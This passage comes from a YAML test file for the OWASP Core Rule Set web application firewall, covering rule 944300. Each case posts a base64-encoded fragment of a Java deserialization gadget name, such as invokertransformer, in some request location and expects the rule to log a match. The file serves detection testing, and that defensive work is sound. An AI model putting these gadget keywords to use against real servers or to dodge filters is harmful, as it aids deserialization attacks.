desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-161 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-163 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-164 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-165 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-166 + desc: "Argument test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-167 + desc: "Argument name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-168 + desc: "Cookie test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-169 + desc: "Cookie name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-170 + desc: "Request header test includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-171 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-172 + desc: "XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-173 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-174 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-175 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-176 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGV0cmFuc2Zvcm1lcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-177 + desc: "Argument test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-178 + desc: "Argument name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-179 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-180 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-181 + desc: "Request header test includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRldHJhbnNmb3JtZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-182 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-183 + desc: "XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-184 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-185 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-186 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-187 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRldHJhbnNmb3JtZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRldHJhbnNmb3JtZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-188 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-189 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-190 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-191 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-192 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-193 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-194 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-195 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-196 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-197 + desc: "Content-Type application/json arg value includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-198 + desc: "Content-Type application/json arg name includes keyword BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BpbnN0YW50aWF0ZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-199 + desc: "Argument test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW52b2tlcnRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-200 + desc: "Argument name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW52b2tlcnRyYW5zZm9ybWVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-201 + desc: "Cookie test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-202 + desc: "Cookie name includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW52b2tlcnRyYW5zZm9ybWVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-203 + desc: "Request header test includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW52b2tlcnRyYW5zZm9ybWVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-204 + desc: "XML attribute value includes keyword aW52b2tlcnRyYW5zZm9ybWVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 